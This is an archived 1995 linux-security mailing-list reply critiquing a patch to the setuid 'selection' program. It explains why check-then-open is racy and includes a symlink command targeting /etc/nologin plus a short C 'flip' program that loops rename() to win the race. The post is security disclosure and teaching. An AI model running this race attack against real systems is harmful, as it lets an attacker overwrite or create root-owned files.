[331] in linux-security and linux-alert archive
Re: problem with selection
daemon@ATHENA.MIT.EDU (R.E.Wolff@et.tudelft.nl)
Mon Aug 28 18:01:52 1995
To: linux-security@tarsier.cv.nrao.edu
Date: Mon, 28 Aug 1995 13:00:23 +0200 (MET DST)
In-Reply-To: <m0smBb1-00018YC@pandemonium.saar.de> from "Thomas Weber" at Aug 26, 95 05:07:46 am
From: R.E.Wolff@et.tudelft.nl
> This patch seems to fix the problem:
>
> - --- selection-1.7-original/selection.c Tue Aug 2 07:51:45 1994
> +++ selection-1.7/selection.c Sat Aug 26 02:26:12 1995
> @@ -125,6 +125,12 @@
> if (fork())
> exit(0);
> setsid();
> +
> + if (unlink (PIDFILE) && (ENOENT != errno)) {
> + fprintf(stderr, "%s: Could not unlink PID file `%s', terminating.\n",
> + progname, PIDFILE);
> + exit(1);
> + }
>
> if ((fp = fopen(PIDFILE, "w")) != (FILE *)NULL) {
> fprintf(fp, "%d\n", getpid());
>
I'm starting to get wildly annoyed at people who think they can
do security checks in setuid programs.
It is NOT possible to first perform a security check and then
open the file just like before. I repeat: "IT IS NOT POSSIBLE".
----------------------------------------------------------------------
|| I say again: "IT IS NOT POSSIBLE!!!!". ||
----------------------------------------------------------------------
(please forgive my shouting.... :-)
If your patch is installed, I simply do:
cd /tmp;ln -s /etc/nologin .;flip nologin PIDFILE &
^^^^^^^ whatever that is....
before running the previously published exploitation method. It now only
has a 50% chance of succeeding. Bummer.
(because of the unlink in the preceding program, you might have to modify
the attack to create/delete the symlinks as fast as you can instead of
moving them around.)
"flip" is the following program:
/* "flip.c" (C) R.E.Wolff@et.tudelft.nl */
/* Written on Mon Aug 28 +/- 10:00 MDT 1995,
gcc -Wall gave no warnings/errors first compile run :-) (worked too :-) */
#include <stdio.h>
#include <unistd.h>
int main (int argc,char **argv)
{
while (1)
{
rename (argv[1],argv[2]);
rename (argv[2],argv[1]);
}
exit (0);
}
Roger.
--
* legal notice: Microsoft Network is prohibited from redistributing this *
* work in any form, in whole or in part without a license. License to *
* distribute this work is available to Microsoft at $499. Transmission *
* without permission constitutes an agreement to these terms. *
*------------------------------------ Modified from Felix von Leitner ---*
** EMail: R.E.Wolff@et.tudelft.nl ** Tel +31-15-783643 or +31-15-137459 **
*** <a href="http://einstein.et.tudelft.nl/~wolff/">my own homepage</a> ***
